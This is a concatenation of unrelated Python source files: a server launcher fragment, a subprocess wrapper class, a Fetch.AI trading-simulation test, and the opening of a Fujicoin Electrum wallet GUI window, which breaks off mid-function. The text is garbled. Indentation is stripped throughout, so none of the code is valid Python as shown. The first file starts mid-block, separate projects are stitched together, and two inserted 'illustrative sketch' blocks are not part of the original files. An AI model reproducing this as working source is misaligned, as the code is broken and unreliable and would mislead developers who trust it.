opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
execution.py
|
import abc
import os
import queue
import signal
import subprocess
import sys
import threading
class ProcessWrapper(metaclass=abc.ABCMeta):
process = None
output = None
command_identifier = None
finish_listeners = None
def __init__(self, command, command_identifier, working_directory):
self.command_identifier = command_identifier
self.finish_listeners = []
self.init_process(command, working_directory)
self.output = queue.Queue()
read_output_thread = threading.Thread(target=self.pipe_process_output, args=())
read_output_thread.start()
notify_finish_thread = threading.Thread(target=self.notify_finished)
notify_finish_thread.start()
@abc.abstractmethod
def pipe_process_output(self):
pass
@abc.abstractmethod
def init_process(self, command, working_directory):
pass
@abc.abstractmethod
def write_to_input(self, value):
pass
@abc.abstractmethod
def wait_finish(self):
pass
def get_process_id(self):
return self.process.pid
def is_finished(self):
return self.process.poll() is not None
def get_return_code(self):
return self.process.returncode
def stop(self):
if not self.is_finished():
if not sys.platform.startswith('win'):
group_id = os.getpgid(self.get_process_id())
os.killpg(group_id, signal.SIGTERM)
class KillChildren(object):
def finished(self):
try:
os.killpg(group_id, signal.SIGKILL)
except ProcessLookupError:
# probably there are no children left
pass
self.add_finish_listener(KillChildren())
else:
self.process.terminate()
self.output.put("\n>> STOPPED BY USER\n")
def kill(self):
if not self.is_finished():
if not sys.platform.startswith('win'):
group_id = os.getpgid(self.get_process_id())
os.killpg(group_id, signal.SIGKILL)
self.output.put("\n>> KILLED\n")
else:
subprocess.Popen("taskkill /F /T /PID " + self.get_process_id())
def read(self):
while True:
try:
result = self.output.get(True, 0.2)
try:
added_text = result
while added_text:
added_text = self.output.get_nowait()
result += added_text
except queue.Empty:
pass
return result
except queue.Empty:
if self.is_finished():
break
def add_finish_listener(self, listener):
self.finish_listeners.append(listener)
if self.is_finished():
self.notify_finished()
def notify_finished(self):
self.wait_finish()
for listener in self.finish_listeners:
listener.finished()
def get_command_identifier(self):
return self.command_identifier
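# Illustrative sketch, not part of the original module: a minimal concrete
# subclass backed by subprocess.Popen. Details such as encodings and process
# groups are simplified assumptions; stop()/kill() expect the child to run in
# its own process group on POSIX, which this sketch does not set up.
class POpenProcessWrapper(ProcessWrapper):
    def init_process(self, command, working_directory):
        self.process = subprocess.Popen(command,
                                        cwd=working_directory,
                                        stdin=subprocess.PIPE,
                                        stdout=subprocess.PIPE,
                                        stderr=subprocess.STDOUT)
    def pipe_process_output(self):
        # forward each line of the combined stdout/stderr into the queue
        for line in iter(self.process.stdout.readline, b''):
            self.output.put(line.decode('utf-8', errors='replace'))
    def write_to_input(self, value):
        self.process.stdin.write(value.encode('utf-8'))
        self.process.stdin.flush()
    def wait_finish(self):
        self.process.wait()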
|
test_simulation.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the simulation."""
import datetime
from threading import Thread
from typing import List
import numpy as np
import pytest
from tac.agents.controller.agent import ControllerAgent
from tac.agents.controller.base.states import Game
from tac.agents.controller.base.tac_parameters import TACParameters
from tac.agents.participant.v1.base.strategy import SearchFor, RegisterAs
from tac.agents.participant.v1.examples.baseline import BaselineAgent as BaselineAgentV1
from tac.agents.participant.v1.examples.strategy import BaselineStrategy
from tac.gui.monitor import NullMonitor
def _init_baseline_agents(
n: int, agent_version: str, oef_addr: str, oef_port: int, tac_version_id: str
) -> List[BaselineAgentV1]:
"""Baseline agents initialization."""
if agent_version == "v1":
return [
BaselineAgentV1(
"baseline_{:02}".format(i),
"127.0.0.1",
10000,
BaselineStrategy(
search_for=SearchFor.BOTH, register_as=RegisterAs.BOTH
),
expected_version_id=tac_version_id,
pending_transaction_timeout=120,
)
for i in range(n)
]
else:
raise ValueError("Invalid version.")
def _run_baseline_agent(agent: BaselineAgentV1, agent_version: str) -> None:
"""Run a baseline agent. The version."""
if agent_version == "v1":
agent.start()
else:
pytest.fail("Baseline agent version not recognized: {} (must be 'v1')")
@pytest.fixture(params=["v1"])
def baseline_version(request):
"""Version setting."""
return request.param
@pytest.mark.integration
class TestSimulation:
"""Class to test the simulation."""
@pytest.fixture(autouse=True)
def _start_oef_node(self, network_node):
pass
@classmethod
def setup_class(cls):
"""Class setup."""
cls.tac_version_id = "1"
cls.agent_version = "v1"
cls.baseline_agents = _init_baseline_agents(
5, cls.agent_version, "127.0.0.1", 10000, cls.tac_version_id
)
cls.tac_parameters = TACParameters(
min_nb_agents=5,
money_endowment=200,
nb_goods=5,
tx_fee=1.0,
base_good_endowment=2,
lower_bound_factor=0,
upper_bound_factor=0,
start_time=datetime.datetime.now() + datetime.timedelta(0, 2),
registration_timeout=8,
competition_timeout=20,
inactivity_timeout=15,
version_id=cls.tac_version_id,
)
cls.tac_controller = ControllerAgent(
"controller", "127.0.0.1", 10000, cls.tac_parameters, NullMonitor()
)
# run the simulation
try:
controller_thread = Thread(target=cls.tac_controller.start)
baseline_threads = [
Thread(target=_run_baseline_agent, args=[baseline_agent, "v1"])
for baseline_agent in cls.baseline_agents
]
            # launch all threads.
all_threads = [controller_thread] + baseline_threads
for thread in all_threads:
thread.start()
# wait for every thread. This part is blocking.
for thread in all_threads:
thread.join()
except Exception as e:
pytest.fail("Got exception: {}".format(e))
def test_nb_settled_transaction_greater_than_zero(self):
"""Test that at least one transaction has been confirmed."""
assert len(self.tac_controller.game_handler.current_game.transactions) > 0
def test_game_took_place(self):
"""Test that the game actually took place, as expected."""
assert self.tac_controller.game_handler.current_game is not None
def test_baseline_agent_score_does_not_decrease(self):
"""Test that all the baseline agent scores do not decrease after each transaction."""
finished_game = self.tac_controller.game_handler.current_game
game_configuration = finished_game.configuration
game_initialization = finished_game.initialization
game = Game(game_configuration, game_initialization)
scores_dict = game.get_scores()
current_score = np.asarray(list(scores_dict.values()))
next_scores = None
for tx in finished_game.transactions:
game.settle_transaction(tx)
scores_dict = game.get_scores()
next_scores = np.asarray(list(scores_dict.values()))
assert not (next_scores < current_score).any()
current_score = next_scores
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Fujicoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
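# Illustrative sketch (not part of the original file): constructing a
# StatusBarButton. The icon name and callback are hypothetical, and a
# QApplication must already exist before any widgets are created.
def _example_status_bar_button(parent_window):
    def on_click():
        parent_window.show_message("clicked")
    return StatusBarButton(read_QIcon("status_connected.png"),
                           _("Network"), on_click)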
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = QMessageBox.question(self,
"Electrum - " + _("Enable update check"),
_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"),
QMessageBox.Yes,
QMessageBox.No)
config.set_key('check_updates', choice == QMessageBox.Yes, save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
        # History tab needs updating if it used spot prices
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
self.history_model.on_fee_histogram()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
        # Once the GUI has been initialized, check if we want to announce
        # anything, since the callback may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Fujicoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Fujicoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # "Settings"/"Preferences" are reserved menu titles on macOS; use a different label as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://www.fujicoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('fujicoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Fujicoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Fujicoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
